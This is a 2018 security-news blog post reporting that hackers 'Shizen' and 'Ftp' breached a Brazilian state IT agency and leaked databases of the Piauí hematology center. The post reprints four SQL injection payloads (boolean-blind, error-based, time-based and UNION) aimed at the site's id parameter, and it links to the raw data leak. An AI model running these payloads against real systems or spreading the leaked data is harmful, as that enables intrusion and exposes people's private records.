Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brasil, managing to leak the contents of databases tied to the Hematology and Hemotherapy Center of Piaui online. Having covered Shizen many times throughout the past, this appears to be the first hack carried out under the banned of New World Hackers, after previously conducting hacks on behalf of Pryzraky – perhaps indicating a change of teams or allegiances. 

Regardless, to serve as proof of the hack, in a data dump posted to Twitter this morning, the hackers posted a mirror of the sites contents – 21 different databases in all. Analyzing the hack, it appears as though the group was able to gain remote access to site databases through a multitude of SQL vulnerabilities left unaddressed by site security architects, ultimately granting hackers access to PHP 5.3.3 files, attached to a MySQL 5.0 Database hosted on an Apache 2.2.16 web server. In another surprise move, Shizen even released the exact vulnerabilities effected and payloads delivered within the framework of the leak itself – something normally redacted or kept private.

For Example, Here are The 4 SQL Vulnerabilities Implicated:

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=13′ AND 7214=7214 AND ‘aWjt’=’aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13′ AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘lEbP’=’lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13′ AND SLEEP(5) AND ‘ouoQ’=’ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: id=13′ UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)– EKMl

Raw Database Leak: https://ghostbin.com/paste/6w4ok

Image may contain: text

https://twitter.com/__sh1z3n/status/1079589738355531777

Published by

Brian Dunn

Writer, Researcher Owner: Rogue Media Labs | Rogue Security Labs (929)-319-2570 BrianDunn@RogueSecurityLabs.Ltd

Leave a Reply

Your email address will not be published.